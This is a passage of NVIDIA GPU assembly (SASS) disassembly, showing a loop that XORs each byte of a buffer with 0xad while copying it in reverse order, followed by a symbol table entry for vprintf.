        /*0758*/                   IADD.X R9, R9, c[0x0][0x144];
        /*0760*/                   LOP.XOR R2, R2, 0xad;
        /*0768*/                   ST.E.64 [R16], R6;
        /*0770*/                   ISET.LT.AND R5, R4, RZ, PT;
        /*0778*/                   IADD R4.CC, R4, c[0x0][0x150];
        /*0788*/                   ST.E.U8 [R8], R2;
        /*0790*/                   IADD.X R5, R5, c[0x0][0x154];
        /*0798*/                   LD.E.64 R10, [R16];
        /*07a0*/                   LD.E.U8 R2, [R4];
        /*07a8*/                   IADD R0, R0, -0x2;
        /*07b0*/                   IADD R6.CC, R10, 0x1;
        /*07b8*/                   IADD.X R7, R11, RZ;
        /*07c8*/                   IADD R8.CC, R10, c[0x0][0x140];
        /*07d0*/                   LOP.XOR R2, R2, 0xad;
        /*07d8*/                   IADD.X R9, R11, c[0x0][0x144];
        /*07e0*/                   ISETP.GT.AND P0, PT, R0, R3, PT;
        /*07e8*/                   ST.E.64 [R16], R6;
        /*07f0*/                   ST.E.U8 [R8], R2;
        /*07f8*/               @P0 BRA `(.L_21);
.L_20:
        /*0808*/                   ISETP.GT.AND P0, PT, R0, -0x1, PT;
        /*0810*/              @!P0 EXIT;
.L_22:
        /*0818*/                   LD.E.64 R8, [R16];
        /*0820*/                   ISET.LT.AND R2, R0, RZ, PT;
        /*0828*/                   IADD R4.CC, R0, c[0x0][0x150];
        /*0830*/                   IADD.X R5, R2, c[0x0][0x154];
        /*0838*/                   LD.E.U8 R2, [R4];
        /*0848*/                   IADD R6.CC, R8, 0x1;
        /*0850*/                   IADD R0, R0, -0x1;
        /*0858*/                   IADD.X R7, R9, RZ;
        /*0860*/                   IADD R8.CC, R8, c[0x0][0x140];
        /*0868*/                   ST.E.64 [R16], R6;
        /*0870*/                   ISETP.GT.AND P0, PT, R0, -0x1, PT;
        /*0878*/                   IADD.X R9, R9, c[0x0][0x144];
        /*0888*/                   LOP.XOR R2, R2, 0xad;
        /*0890*/                   ST.E.U8 [R8], R2;
        /*0898*/               @P0 BRA `(.L_22);
        /*08a0*/                   BRA `(.L_23);
.L_24:
        /*08a8*/                   BRA `(.L_24);
.L_84:


//--------------------- SYMBOLS --------------------------

	.type		vprintf,@function
